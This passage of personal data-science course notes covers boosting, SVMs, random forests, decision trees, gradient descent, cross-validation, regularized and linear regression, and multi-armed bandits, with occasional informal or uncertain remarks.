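    return base + learning_rate * np.sum([t.predict(X) for t in trees], axis=0)
```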
Thus its an additive model of weak learners. \"Forward stage-wise additive modeling\"\n 3. Ada Boost \"Adaptive Boosting\"\n - Each tree is expert on attacking error of its predecessor. So upweight misclassified points.\n 4. Gradient boosted regression trees\n - Each successive tree fits to the residuals of previous tree.\n - Therefore each subsequent tree truly becomes an expert in the errors of the prior tree\n - And the final prediction is an additive sum of the \"prediction\" for each tree.\n - Gradient Boosting SSS1.\n - The weight beta-m is the sum of the predictions of trees, the weight is higher for later trees, since they can\n - Note this is prone to overfit, since we're fitting to the errors of prior trees. So use CV to determine when to stop.\n - Shallow trees are higher bias, lower variance models. (High bias since shallow, low variance because if we took another sample of data from the population, another 3 split tree would look similar)\n - So by limiting sequential trees to 3 splits, you effectively hone in on the highest error regions of the prior tree, making splits that decrease error (MSE) the most for any given tree.\n - ??What if we bag boosted models?\n - Random forest lends itself for running on parallel computers or cores on a computer. Sequential tree methods such as Gradient Boosting or AdaBoost can not take advantage of parallel processing.\n - In a Random Forest, as you build more trees, the test error should decrease and eventually level off. In Boosting, as you build more trees, the test error should decrease and level off, but then increase if you boost too much. However sklearn describes that GB is fairly robust to overfitting (ie test error increasing)\n 5. Parameter tuning\n - Could set a shrinking learning rate, \"SHRINKAGE\", meaning that we'll only apply 20% of what each subsequent tree suggests to do. Can prevent over fitting.\n - This will require higher n_estimators/trees, because it by definition learns much slower.\n - Ultimately will lead to lower test error with shrinkage. But requires more trees to get there.\n - Since this generally works: so one strategy is to tend to pick the max number of computationally possible trees to make (given time) and search over several hyperparameters discussed here via CV.\n - one of the hyperparameters will be learning rate\n - Parameter tune tree structure:\n - Max depth: controls degree of interactions between variables; often not larger than 4-6\n - Min samples per leaf: limits overfitting\n - Number of trees should also be tuned, because if you have too many, test error tends to increase, due to overfitting\n - Note that the SHRINKAGE parameter (learning rate in GB) is very important, and if not included (ie for stochastic gradient boosting below), can lead to unstable estimates because full votes from subsamples tend to go in a worse direction. so need to limit their vote\n 6. Stochastic gradient boosting\n - So fit to a fraction of the total data at each step\n - Also fit a random subsample of features (like random forests)\n - In Sklearn's implementation of gradient boosting, max_features limits the features space explored for best split at each node.\n - These two techniques lead to both improved accuracy and decreased computational time\n - Often need to ensure a Shrinkage parameter for these to work.\n 7. 
sklearn.grid_search\n - input dictionary of hyperparameters and a list of their options.\n - Will cross-validate search over permutations of parameters and return the best combinations of parameter.\n - SKlearn recommends: setting n_estimators as high as possible (3000,5000)\n - Tune all hyperparameters via grid search\n - Further optimize n-estimators and learning rate\n - Can review Rs's gbm package documentation\n - You must tune the model to get good performance\n 8. Diagnostics\n A. Ways to infer feature importance from black box models\n - Partial dependency plots\n - Take your feature/variable x1 you want to study. Change all data points x1-i to x1-j to values x1i through j sequentially. IE CHANGE ALL VALUES to x1-i once, then X1-i2 once etc.\n - record the predicted output y of your model\n - then can generate a plot for a given feature of how your model predicts y to change based on numeric changes of feature x1.\n - can repeat for all features and obtain a sense of the importance of each feature in your model. ie some inferential power.\n - can also do partial dependence plots for 2 variable interactions. to try to see if there is interaction by slope of plane?? not sure\n - Variable importance measures\n - Recall we discussed for bagged/RF trees, decrease in RSS for a given predictor averaged over all trees. Or change in Gini index for a given predictor, averaged.\n - Sensitivity analysis, where you sequentially change the value of a feature and see response change (similar to partial dependency plots)\n 9. AdaBoost\n - Significance of a given tree to the final model is weighted by the amount of error it demonstrates.\n - So it effectively upweights trees that perform better, whcih will be later trees in many cases.\n - error is defined as the number of mis-classifications over total predictions\n - AdaBoost Formula SSS2\n 10. XG Boost\n - For every given feature, keep only the percentiles of that feature, which greatly reduces the space over which the algorithm needs to decide where to split.\n - but you still keep all observations of the data.\n - so you get computational speed gains to grow a tree\n - This serves as a form of regularization, resulting in a slightly less complex model and less variance.\n\n\n\n\n\n ```\n ***MAKE A DECISION TREE OF THE HIERARCHY OF TREE BASED METHODS, FROM DECISION TREE TO BAGGING TO RANDOM FOREST TO BOOSTING. TO BEST UNDERSTAND THESE METHODS\n ```\n\n\n\n ???max depth in boosting decreases variance?\n ???review tree HIERARCHY\n ???stochastic gradient boosting defined by max features and subsample only?\n\n\n\n\n\n160622 Liga Data lecture\n 1. Perform sensitivity analysis (change values of each data point for each variable and see the effect on output) to help determine the most important features. See sensivity_analysis on wiki. OFAT\n 2. Concept of Dependent by Category DBC:\n - Of the top 10 or so variables, systematically create hierarchical interactions.\n - Maintain a matrix of the calculation of the importance of each of the interaction variables (ie via sensitivity analysis method above)\n - This can often help identify the most important features for a model (the interactions), since the important interactions will often be from the most important features (independently) and aren't too deep (one or two, rarely 3+)\n - Can also update the matrix when new data comes in to perform a model \"refresh\" rather than a full retrain. 
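A rough sketch of the one-feature-at-a-time sensitivity / partial-dependence idea described above (my own example; `model` is assumed to be any already-fitted estimator with a `.predict` method and `X` a numpy feature matrix):

```python
import numpy as np

def partial_dependence(model, X, feature_idx, grid_size=20):
    """For each candidate value of one feature, set that feature to the value
    for every row, predict, and average -- the partial dependence curve."""
    values = np.linspace(X[:, feature_idx].min(), X[:, feature_idx].max(), grid_size)
    avg_preds = []
    for v in values:
        X_mod = X.copy()
        X_mod[:, feature_idx] = v           # overwrite this feature everywhere
        avg_preds.append(model.predict(X_mod).mean())
    return values, np.array(avg_preds)

# usage sketch (hypothetical fitted model and training matrix):
# vals, curve = partial_dependence(gbr, X_train, feature_idx=0)
# plt.plot(vals, curve)
```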
Not sure, but this may also help to allow selection of other interactions based on the new data, by comparing the pre-post performance of the interactions performance on your matrix\n - Can help with a model in production to refresh faster without too much investment of time/effort\n 3. The larger the gap between training and test performance suggests worse generalizability of the model. So try to create a gap-adjusted performance metric to account for this. Want models to be generalizable, so don't just consider test performance\n 4. http://dmg.org/ for a list of pmml data mining software, analysis methods and pmml compatability, which can help with production, since pmml is a portable code standard?\n\n\n\n160622 Support Vector Machines\n 1. Support vector classifier\n - need to scale data\n - known as a \"maximal margin classifier\"\n - works based on defining a hyperplane to the data (only works with perfectly separable data) which has a normal vector w.\n - The dot product of the normal vector w with unknown point u: if the sign is positive or negative, it will classify the point to one side or the other of the hyperplane.\n - In order to make the hyperplane most generalizable, you want to maximize the distance between the nearest points and the hyperplane.\n - Do this by setting up a margin around the hyperplane and this effectively is a constraint.\n - How to you optimize an equation with a constraint? Several ways but LaGrangian? is one way. \n - Essentially we want to solve for w, which defines the orientation of the hyperplane, whcih is the important part.\n - b defines the distance of the hyperplane from the origin (constant? for a given plane).\n - So the optimization equation solves for alphas, relative to y (labels) and x's (points).\n - alpha goes to zero for all NON SUPPORT vector points. Therefore in w = sum(alpha-i, y-i, x-i), alpha is only relevant for the points closes to the line/margin.\n - The solution for alphas allow you to solve for w (normal vector of the hyperplane) with the equation above.\n - Since x's and y's only matter for support vector points (since alphas for all other points go to zero), SVC can be a CONCISE REPRESENTATION of a large data set.\n - The optimization equation, however, is hard/slow to solve. Which is a limitation.\n - There are inherent properties of SVT which limit overfitting\n - SVMs shine with moderately sized data, given its benefits, discussed below, but is slow/less optimal for very large data sets.\n 2. Slack variable\n - Adding a slack variable which establishes a \"budget\" for how many points can be on the \"wrong\" side of the margin. Slack variable is \"squiggle\" in the lecture.\n - This allows for SVC to function with (real world) non separable data\n - Do this by changing the hyperparameter C in SVC in sklearn, which denotes the cost function. The smaller it is, the wider the margins are. The larger it is, it will converge on the smallest road\n - All points within the margin are now considered support vectors\n - Since w = sum(alpha * xi * yi), as the margins change, and different numbers of support vectors are used, the slope of the dividing hyperplane will change, since the slope is determined by the normal vector w.\n 3. Kernals:\n - Kernals allow us to get the result of the dot product of vectors after being transformed to a higher dimensional space without needing to know what the transformation is.\n - the kernals transform vectors to an \"infinite dimensional\" space. 
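A hedged sklearn sketch of the slack-variable C discussion above (my own illustration on synthetic data; smaller C = wider margin / more slack, larger C = narrower margin):

```python
from sklearn.datasets import make_classification
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC

X, y = make_classification(n_samples=200, n_features=5, random_state=0)
X = StandardScaler().fit_transform(X)        # SVMs need scaled features

for C in [0.01, 1, 100]:
    clf = SVC(kernel='linear', C=C).fit(X, y)
    # as C grows, fewer points sit inside the margin, so fewer support vectors
    print(C, clf.n_support_, clf.score(X, y))
```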
thus it is possible to find a boundary that classifies any point, in theory.\n - In other words, it allows us to fit SVCs to very non-linear boundaries to classify data.\n - Note that it is possible to overfit data using this, ie drawing a boundary around every single data point = not generalizable.\n - Kernals most often used are: linear, polynomial of degree d and radial basis function (gaussian) 'RBF'\n - RBF is the commonly used kernal though prone to overfitting\n - As you increase gamma (in SVC in SKlearn), the variance around each boundry decreases (more likely to overfit)\n - As C increases, model tries to not get points wrong or misclassified, so again, more likley to overfit.\n - A Grid Search: calculate validation accuracies (crossvalidation) for changing C and gamma hyperparameters, to identify the optimal values of the hyperparameters\n 4. For multiple classes, create an SVM model for one versus all or pairwise (one versus one, pairwise).\n -Then predict based on majority vote based on all the models\n\n\n160621 Random Forest\n 1. Review of Decision Trees\n - In regression trees, the tree effectively performs axis-parallel splits, cordoning off the data into regions defined by lines parallel to the (x,y,z etc) axis.\n - This is inherently different from linear regression models which speak to their strengths in some settings\n - How to regularize decision trees: Pre and post pruning\n - Post pruning; after fitting trees deeply, decide threshold to prune back tree. - Ie one threshold is to prune back to minimum of data in a terminal node > the p available features\n - Pre pruning: define a penalty term alpha where alpha * abs(#terminal nodes) is a penalty term added to the MSE, and minimize this equation. Cross validate to determine alpha. ** This is used most commonly **\n - * However, ensemble methods to build trees ie random forest will almost certainly do better than either pre/post pruning *\n - Recall that in classification trees, chose an error metric such as Gini or Entropy error functions, both of which perform very similarly. In regression trees, use RSS to calculate information gain.\n - Making predictions, at each terminal node, for regression: predict using average. For classification: predict the most commonly occurring class.\n 2. Pros and Cons of decision trees\n - Pros: how we think, easy to explain\n - Cons: tend to overfit--do not strike balance of bias/variance tradeoff well, computationally intense\n - Variance of a deep tree is high (since a second set of data produced from the same distribution will likely perform poorly); ie doesn't generalize well. Though bias is low for the training data (ie fits training data well)\n - Less deep trees have higher bias\n 3. Bagging: Bootstrap AGgregatING \n - growing a lot of trees and adding them together, which can serve to average away the variance (CLT)\n - Use bootstrapping such that trees grown will be slightly different (since data is slightly differet). 
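A quick sketch of the pruning-by-CV idea from the decision-tree review above (my own example; the dataset and parameter grid are arbitrary, and older sklearn versions import `cross_val_score` from `sklearn.cross_validation` instead of `sklearn.model_selection`):

```python
from sklearn.datasets import load_iris
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeClassifier

X, y = load_iris(return_X_y=True)

# compare increasingly deep trees; pick the depth with the best CV score
for depth in [2, 3, 5, 10, None]:
    tree = DecisionTreeClassifier(max_depth=depth, min_samples_leaf=5)
    score = cross_val_score(tree, X, y, cv=5).mean()
    print(depth, round(score, 3))
```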
Because otherwise, tree growing for a given set of data is deterministic, ie would make the same tree over and over.\n - Inherently parallelizable, can have multiple cores/computers building a set of trees\n - Recall that each bootstrapped sample contains roughly 2/3 of the original observations, so trees grown from different bootstrapped samples share much of their data.\n - Out of bag error: side-effect of building the model from a bootstrapped sample is that you have ~1/3 of the data not used in each bootstrapped sample that can be used for test-error estimation (ie an inherent validation set).\n - Can use that 1/3 of the data and evaluate it using the trees not grown from that bootstrapped sample.\n 4. Random Forests:\n - BUILDS ON BAGGING: so you still take bootstrapped samples of the data (typically the same number of samples as the original data set).\n - At each split, consider a random selection of m predictors at each split, in each tree. Typically m = sqrt(p). Ultimately tune m with cross validation.\n - Leads to decorrelation of the trees, which leads to improved performance over bagging.\n - BIG IMPROVEMENT>>>> THIS serves to decrease variance of the total model.\n - RF Bias Variance SSS4\n - As you build more trees in RF, bias stabilizes and variance asymptotically declines. Thus it is better to build as many trees as possible. The real limitation is computational time. And there is ultimately a point beyond which growing more trees is essentially futile. So test for this via CV.\n A. Feature Importance\n - How to determine?\n - Frequency of use as a split feature?\n - Record total amount of RSS decrease (or Gini index decrease) for a given predictor averaged over all B trees. Larger value indicates importance.\n - To evaluate the importance of the jth variable, record OOB accuracy of the model. Then shuffle (permute) all values of the jth variable across all the samples. Re-compute the accuracy. The lower it gets, the more important the jth variable was. Repeat for each var and rank the importance of the var.\n - Other ways (Sklearn methods): how high in the tree a feature is used, or the expected fraction of data points that reach a node, are both surrogates\n B. Bias Variance Tradeoff\n - Since variance is proportional to the pairwise correlation p and (in its second term) inversely proportional to the number of trees B in a RF, the RF procedure serves to decrease variance by averaging over B trees. p goes down and B goes up.\n - Variance RF = p * sig^2 + ((1-p)/B) * sig^2\n - Information Gain SSS3\n - SSS6 Bias Variance Tradeoff\n - Averaging over many RF trees serves to decrease variance of the model.\n C. Tuning\n - Hyperparameter: parameter set ahead of time, defining the structure of the model. It is not learned by the model to achieve best fit. Often choose them via cross validation.\n - The key hyperparameter in RF is m, describing how many features are (randomly) available at each node when building each tree of the RF.\n - Select via CV (see the short sketch below)\n - You can test several hyperparameters via CV, but RF has very many (~14), so adding each becomes more complicated. So likely need to decide some using heuristics like: for classification m = sqrt(p), for regression m = p/3.\n - Note that tree depth is another hyperparameter for RF; if trees are too deep, RF can overfit.\n - Can use Feature Importance techniques above to try to select features of greatest importance to include when building trees. Becomes an issue if m is small: that leads to decorrelated trees (good for low variance), but if unimportant variables >> important variables, the model will not learn.
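Short sketch of tuning m (max_features) and reading the free out-of-bag estimate described above (my own example on a synthetic dataset):

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier

X, y = make_classification(n_samples=500, n_features=20, random_state=1)

for m in [2, 4, 'sqrt', None]:               # None = all features, i.e. plain bagging
    rf = RandomForestClassifier(n_estimators=200, max_features=m,
                                oob_score=True, random_state=1)
    rf.fit(X, y)
    # oob_score_ is the built-in validation estimate from the ~1/3 left-out rows
    print(m, round(rf.oob_score_, 3))

# mean-decrease-in-impurity feature importances, averaged over all trees
print(rf.feature_importances_[:5])
```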
Again, reinforces why important to tune m via CV which should identify this.\n - Seems like the above also seems to be augmented if number of trees grown is low relative to number of features.\n D. Other Issues\n - Can weight predictor classes using a user-specified loss matrix. Ie certain pieces of information are more important or prefer to err on false positive etc.\n - Missing data: many ways to deal with it. But consider setting to nonsensical value so you don't include \"false\" data in model.\n - Note, can use cross-validation to determine best way to deal with missing data from several candidate methods\n - Random forest lends itself for running on paralell computers or cores on a computer. Sequential tree methods such as Gradient Boosting or AdaBoost can not take advantage of paralel processing.\n\n\n160620 NonParametric Learners\n 1. K Nearest Neighbors\n - Sort the training points x by increasing distance from new point\n - predict the majority label of the k closest points; select k as a hyperparameter based on experimentation or prior knowledge.\n - if k is too small, tend to be overfit (model doens't generalize well), if k is too large, will be insensitive. the extreme case is that if you use the entire population n as k, you will always predict the majority class\n - general rule, can start with k = sqrt(n)\n - important to SCALE features, since we're calculating the distance between the features, we need to have them on the same scale, otherwise, that with the higher range will dominate the distance equation, making the other feature irrelevant.\n - Can implement weighted voting, where closer points are weighted more\n 2. Problems\n - The curse of dimensionality: knn works well for lower dimensional spaces, but as d>5, becomes more problematic. Becuase the nearest \"neighbor\" become far away in many dimensions.\n - Predicting can be slow\n - Difficulty with imbalanced classes\n - Can consider weighting or sampling schemes to counteract this. Ie in a fraud detection case where you have 0.1% of the sample as fraud instances, and the rest are valid instances, you can downsample (randomly) the valid cases when training your model.\n - categorical features don't work well\n 3. Decision Trees\n - Calculate the entropy of the dataset at the root node, \"before the first split.\"\n - Perform a split of the data on every available feature (x), and calculate the entropy before and after. The Information Gain is entropy before - after. Then choose a split based on the highest information gain.\n - H(S) \"entropy\" = - Sum of probability(S) * log 2 probability(S)\n - Information gain = H(S) - sum\n - This method is top-down and greedy, making a decision based on the best information available at the time.\n - note that the \"greedy\" quality may mean that you do not make the decision that optimizes the overall performance. Will not revisit split decisions.\n - Gini index: another splitting measure similar to the entropy equation.\n - sum(probability(S)(1-probability(S))\n - The misclassification rate is also available in sklearn, but has a linear slope up to the maximum of 0.5, so in practice does not work as well as gini or entropy.\n 4. 
Pros cons\n - The tree will fit every single observation, so it will have a tendency to overfit the data\n - Prune the true to address overfitting (in sklearn): min leaf size, max depth, purity (data points of the same class), gain threshold\n - if you use decision trees, you must prune the model; though practically speaking, we use ensemble tree methods (random forests) so pruning is not really necessary\n - Pros: low bias, simple to understand/interpret, nonparametric and non-linear, computationally easy to predict, deals with irrelevant features, works with mixed features\n - Cons: High variance, computationally expensive to train, greedy algorithm\n 5. Cost Complexity pruning\n - Since decision trees will tend to overfit, a way to avoid this is to prune back the tree. One way is by cost-complexity pruning, which selects a tuning parameter alpha penalizing the subtree's complexity and fit to the training data.\n - Often, select alpha via cross validation, comparing the mean squared prediction error via cross validation for each alpha. Pick the alpha to minimize average error.\n - Then return the sub-tree for the chosen alpha.\n 6. Both CLASSIFICATION tree and REGRESSION trees can be built.\n - The RSS is used as a measure of \"information gain\" with each split of a regression tree (continuous outcome).\n - the Gini Index or \"Cross entropy\" equations are used for classification trees, whcih basically classify the error rate before and after a given split (correlating with information gain), therefore allowing decision on what is the most \"informative\" split at a given node.\n - Tree methods can outperform linear regression when there is a highly non-linear and complex relationship between the features and the response.\n\n\n160617 Gradient Descent\n 1. Optimization\n - Find the min or max of a function: maximize likelihood or minimize square distance\n - Machine learning methods rely on optimizing a \"cost function\". Cost functions are the mathematical definition of your machine learning goal.\n - Intuition for gradient descent: If you take a guess and pick a point on the curve. You can calculate the derivative of the function from that point ( or the derivative as suggested by picking two close-points), you can then see the direction of the derivative. Depending on if you're maximizing/minimizing the function, you move in the respective direction based on the derivative, check it again at the next point until your derivative is near zero (which represents a maxima or minima).\n - The \"gradient\" is defined as the sum of the partial derivative of multiple variables. This is actually what you calculate in the above scenario for multiple variables.\n - the gradient points in the direction of steepest ascent\n - the gradient is in the direction of the steepest ascent. The gradient points upward, so we descend down the gradient\n - in gradient descent, follow the line of the steepest descent on the cost surface to find the minimum\n - Per iteration through features of the model, you update the parameters simultaneously with respect to that gradient. 
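A bare-bones gradient descent loop for the OLS cost, following the update rule just described (my own sketch; `lr` is the learning rate and the toy data are made up):

```python
import numpy as np

def gradient_descent(X, y, lr=0.1, tol=1e-6, max_iter=10000):
    """Minimize the mean squared error cost for linear regression."""
    n, p = X.shape
    beta = np.zeros(p)
    for _ in range(max_iter):
        grad = (2.0 / n) * X.T.dot(X.dot(beta) - y)   # gradient of MSE w.r.t. beta
        beta -= lr * grad                             # update all parameters at once
        if np.linalg.norm(grad) < tol:                # converge on gradient magnitude
            break
    return beta

# toy check: recover known coefficients (scale features first in practice)
X = np.random.randn(200, 3)
true_beta = np.array([1.0, -2.0, 0.5])
y = X.dot(true_beta) + 0.1 * np.random.randn(200)
print(gradient_descent(X, y))
```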
In other words, you calculate the gradient once per iteration.\n - NB: Gradient descent does not work with LASSO, since not differentiable given absolute value cost function\n - Requires differentiable and convex cost function\n - Only finds global optimum on globally convex functions\n - Convergence asymptotically\n - Choices of convergence criteria: max number of iterations, change in cost function, magnitude of gradient\n - Performs poorly without feature scaling. Since if higher varaince for some variables, may take extra time. Can scale features back once optimization is performed\n 2. Stochastic Gradient Descent\n - Use a subset of data\n - SGD computes cost function using a single, different randomly chosen observation per iteration. On average, it achieves the same as GD, but may have more variability\n - SGD actually converge faster on average than batch GD, can oscillate around the optimum\n - SGD generally requires less memory and computation and is faster, so is generally preferred. \n\n\n160616 Logistic Regression\n 1. Accuracy is the percent of observations correctly classified (TP+TN)/n\n - However, imbalanced classes will inflate accuracy\n - Doesn't reveal what kind of errors are being made.\n - Precision: True positives over those who were classified as positive.\n - F1 score (or F beta score) is a weighted harmonic mean of precision and recall. Rewards balanced precision and recall, rather than if it is unbalanced (if one is higher than the other).\n - ROC Curve, plotting true positive rate and false positive rate.\n - Area under the curve.\n - SSS5 Classifier Metrics\n -SSS15 ROC Curve Sensitivity and Specificity\n\n\n\n160615 Cross Validation Regularized regression\n 1. Bias variance tradeoff\n - A biased model centers around the incorrect solution. Bias can result from underfitting or from collecitng data poorly\n - High variance in the model can be caused by overfitting or by insufficient data\n - A model's expected squared prediction error will depend on the variability of y, and the variability of the training set used to train our model.\n 2. Cross Validation : helps to choose the best model that performs well on unseen data\n - Split data into training and validation sets\n - We use cross valiation in order to get a sense of the error. However, build the final model on all of the data.\n - Leave one out cross validation: build n models on n-1 data points and calculate MSE on 1 remaining data point. Computationally expensive and high variance since the tests are so small. So large variance in the error.\n - Medium between LOOCV and 1 fold CV is k-fold CV, below.\n - Use training set to train several models of varying complexity\n - Then evaluate each model using the validation set: R2, MSE, accuracy etc.\n - Keep the model that performs the best over the validation set\n - As you increase complexity of the model, MSE of the training data will go to zero.\n - but this will also increase the MSE of the test data.\n - So you want to choose the optimal model complexity that optimizes test MSE, while maintaining the most parsimonious model.\n 3. 
k-fold Cross Validation:\n - Randomize data set into k groups, train using k-1 folds.\n - Validate using the left out fold and record the validation metric for each validation such as RSS or accuracy\n - Average the validation results.\n - By increasing the number of folds, you decrease the variability of the mean squared prediction error of the model by averaging over the folds.\n * SO PRACTICALLY SPEAKING we often use cross-validation during model BUILDING: to optimize hyperparameters such as lambda in LASSO or Ridge, or to compare different versions of models. Once the model is built, we often FIT the model to the entire TRAINING data set, to fit the coefficients, and then compare performance on the TEST data set.\n 4. To prevent model fitting due to too many features:\n - Metrics to compare models\n 1. R squared is 1 - (MSS/TSS), 0 = awful, 1= awesome.\n - R2 essentially is the ratio of the sum of squared errors for the fitted model versus the null model with the null model predicting the average of the target (true) value, regardless of predictors.\n - However R2 will increase as you increase parameters, making it a poor comparator between different models.\n - R squared increases as you increase predictors, so can't really be used to compare between models.\n 2. Adjusted R2 penalizes for number of predictors, making it a better comparator of accuracy between models. (n-1) / (n-p-1)\n - However Adjusted R2 tends to under-penalize complexity\n 3. Information Theoretic Approaches: AIC, BIC\n 4. Test, training set. Compare test set error between models.\n 5. Cross validation. Average test error across all k-folds, and compare this between models of interest.\n - Cross validation makes no parametric or theoretic assumptions\n - Given enough data, can be highly accurate. is conceptually simple.\n - Cons: can be computationally intensive, if fold size is low, can be conservatively biased.\n\n\n\n - Subset selection:\n - Best subset: try every model combination and pick the best model (computationally intensive)\n - Stepwise: iteratively pick predictors to be in and out of model.\n Forward/backward stepwise selection.\n - Test between model candidate built by stepwise: AIC, BIC, Adjusted R2, Mallows C. Or can use CROSS VALIDATION\n - Better NOT TO USE RSS or R2.\n - Mallows Cp: Increases penalty for each parameter included. So needs to reduce the RSS faster than the penalty term\n - AIC, BIC, Adjusted R2 have similar rationale as Mallows Cp.\n - AIC/BIC are available across the gamut of parametric models, so these are the more common methods to use to choose a model.\n - These can be thought of alternatives to cross-validation to pick the best performing model. Cross validation can be performed on any model, whereas AIC/BIC may not be available for some models.\n - Regularization - TBD\n - Dimensionality Reduction - TBD\n 5. Regularized Linear Regression\n - Shortcomings of OLS\n - In high dimensions, data is usually sparse : the curse of dimensionality\n - Linear regression can have high variance (ie tend to overfit) on high dimensional data\n ** This leads to the desire to want to restrict or normalize or regularize the model so that it has less variance **\n 6. 
RIDGE REGRESSION - \"L2 norm\"\n - So regularization adds a penalty term that penalizes larger values of beta (penalizes large values more than small values of beta)\n - penalty is in proportion to the square of the beta coefficient, hence \"L2\" normalizing factor.\n - lambda is the penalty applied to the coefficients\n - higher the lambda the more the \"bias\" of the model. Labda = 0 is no different from standard linear regression.\n - notably, all variables need to be normalized, since lambda will apply penalty (large values of the coefficient) proportional to its scale. So variables must be normalized.\n - changes in lambda changes the amount that large coefficients are penalized\n - increasing lambda increases the model's bias and decreases variance\n - Use cross-validation to identify the ideal lambda that decreases the error of the model.\n 7. LASSO - \"L1 norm\"\n - Instead of the penalizing the square of the coefficient, you penalize the absolute value of the coefficient, which has the benefit of driving some coefficients to zero (rather than near zero with Ridge)\n - Tends to set coefficients exactly equal to zero\n - Automatic feature selection, leads to sparse models\n - Ridge is computationally easier because it is differentiable\n - True sparse models benefit from lasso, dense models benefit from ridge\n - Even in a situation where you might benefit from L1's sparsity in order to do feature selection, using L2 on the remaining variables is likely to give better results than L1 by itself.\n 8. So use cross-validation to select lambda which optimizes error for either LASSO or Ridge \n - Range of lambda (alpha in SKlearn) is 0 to infinity.\n - A lambda of zero in LASSO is identical to linear regression\n\n\n\n\n160614 Linear regression\n 1. Parametric model\n - Assumptions are strong, but so are conclusions. Models are simple, interpretable and flexible.\n - y hat indicates prediction of Y based on X=x\n - RSS grows with n, not by itself interpretable.\n - R2 proportion of variance explained by the model\n - R2 increases with features included into the model.\n - As you increase features, you risk overfitting data\n - Overfitting is learnign the data's signal and the noise, limiting generalizabiility to additional nonobserved data.\n - F test can be used to compare a model with another nested model\n - If model with missing predictor/s don't matter for prediction, F statistic will be small\n - You get a probability of F statistic which \"MAYBE\" can be interpreted as the p-value for the entire model??\n - If you have covariates that are not significant by p-value, remember that you may have correlation between coefficients and that interpretation of the meaning of the coefficients may be difficult.\n 2. Assumptions of a linear regression:\n 1. Linear relationship between predictors and outcome\n 2. Errors (residuals between predicted and true) are independent and identically distributed. And in time series, there is no correlation between consecutive errors.\n 3. Constant variance of errors, aka homoscedasticity. Ie errors don't change over time, versus the predictions or versus any independent variable.\n 4. Normality of the error distribution\n\n 3. Troubleshooting.\n 1. Multicolinearity: If two or more predictor variables are highly correlated with each other, the uncertainty in model coefficients becomes large. 
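Going back to the regularization notes above, a small sketch of picking lambda (called alpha in sklearn) by cross-validation (my own example; remember to scale features first; older sklearn versions import `cross_val_score` from `sklearn.cross_validation`):

```python
import numpy as np
from sklearn.datasets import make_regression
from sklearn.linear_model import Lasso, Ridge
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

X, y = make_regression(n_samples=200, n_features=30, n_informative=5,
                       noise=5.0, random_state=0)

for alpha in [0.01, 0.1, 1, 10]:
    lasso = make_pipeline(StandardScaler(), Lasso(alpha=alpha))
    ridge = make_pipeline(StandardScaler(), Ridge(alpha=alpha))
    print(alpha,
          round(cross_val_score(lasso, X, y, cv=5).mean(), 3),
          round(cross_val_score(ridge, X, y, cv=5).mean(), 3))

# Lasso drives many coefficients exactly to zero (sparse model)
lasso_fit = make_pipeline(StandardScaler(), Lasso(alpha=1)).fit(X, y)
print(np.sum(lasso_fit.named_steps['lasso'].coef_ == 0), "coefficients set to zero")
```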
Affects the interpretability of coefficients\n - Can use a correlation matrix to look for pairwise correlations.\n - use VIF (variance inflation factors) for more complicated relationships. To try to figure out whcih variables are colinear\n - Run OLS for each predictor as a function of all other predictors. K times for k predictors.\n - Benefit is that it looks at all predictors together.\n - Rule of Thumb is >10 is problematic\n - remove (but make note of) any predictor that is easily determined by the remaining predictors.\n 2. Outliers: When y is far from predicted y hat. Least Squares is particularly affected by outliers.\n - Residual plots can help identify outliers.\n - Influence plots can distinguish outliers from high leverage points.\n 3. Heteroscedasticity: the existence of more than one population of variability/variance. Ie residuals do not have constant variance.\n - Can test by plotting the residuals\n - If heteroscedasticity is present, can invalidate the assumption that modeling errors are uncorrelated and uniform. \n - Solution may be to transform Y, ie log transformation of Y, or sqrt(y).\n 4. Normality of Residuals: Linear regression operates under the assumption that residuals are normally distributed\n - Can check this assumption with a QQ plot.\n - If residuals are not normal, may transform the response.\n 5. Non-linearity relationship between outcome and predictors.\n - Can consider adding a squared version of the predictor.\n - same as adding a higher order polynomial of a predictor to the feature space. Ie adding x^2 or x^4\n - Also spline, polynomial, step function, local regression, generalized additive models. \n - Can capture nonlinear aspects of the relationship between parameters and y using the above methods: spline, polynomial etc\n - Can also transform the y feature space to try to address this.\n 6. Mean Squared Error is proportional to Residual sum of squares. In fact it is RSS divided by sample size n.\n\n\n\n\n\n160613\nLinear Algebra\n 1. matrix multiplication\n - For the given row-column target in the matrix, sum of mulitply the elements of matrix1 row times matrix2 column.\n 2.\n - Only square matrices are invertable\n - Eigenvectors/eigenvalues are values that do not change except for by a scalar through a transformation\n - A stochastic matrix represents the probabilty of goig from one state to another. \n - Axis zero is column-wise, axis 1 is row-wise in numpy (opposite in pandas)\n 3. Exploratory Data Analysis\n - Look at the distribution of individual features\n - Then look at bivariate plots\n - ie scatter with kernal density plots\n - pandas scatter matrix\n 4. Linear regression\n - Cost function: usually is ordinary least squares. So you minmize the residual sum of squares. Minimizing the cost function in linear regression.\n - The error term or the \"residual\" is the difference between predictions and is assumed to be iid, and normally distributed with N( mean = 0 and variance).\n - Reliability of linear regression\n - R squared, coefficient of determination. Compares your model versus a model that is just the mean. A high R squared on its own does not imply a good model.\n - If features are correlated, this breaks the assumption that features are independent and errors are iid so this can affect validiy of the model.\n - F test compares model with null model. Shortcoming is that it doesnt' tell you which beta is unequal to zero.\n - Can perform hypothesis test on coefficient\n\n\n\n160610\nMultiarmed bandit\n 1. Conjugate Prior \n 1. 
Conjugate Prior: Posterior is proportional to the likelihood x prior\n 2. We use probability distributions (which integrate to 1) to model both the posterior and the prior in the Bayes Theorem equation.\n - The beta distribution is a known distribution that we will be using to model the PRIOR event for an event that has a likelihood of a binomial distribution.\n - We model the POSTERIOR distribution with the binomial distribution usually.\n 3. Assumptions of the conjugate prior method are the same as for the binomial distribution: one of which is that the probability is Constant\n 4. For the beta distribution, the alpha parameter is the number of conversions you had, the beta is the number of non-conversions (using the CTR example for a website A/B test)\n 2. Traditional A/B testing\n 1. Epsilon first testing: explore first for x tests, then use results\n - Pitfalls include: only after a set time, do you use data and pick the better performer, potentially losing money\n 3. Multi-Armed Bandit\n 1. Strategies to optimize exploration and exploitation, leraning as you go and making changes to behavior.\n 2. Method of adaptive, reinforcement learning.\n 3. Goal is to maximize return and minimize \"regret\" or using the sub-optimal option.\n 4. Strategies\n 1. Epsilon Greedy: Explore with some probability epsilon, often 10%\n - All other times we will exploit the option with the best performance\n -After we choose a given bandit, update the performance based on the result.\n 2. Upper 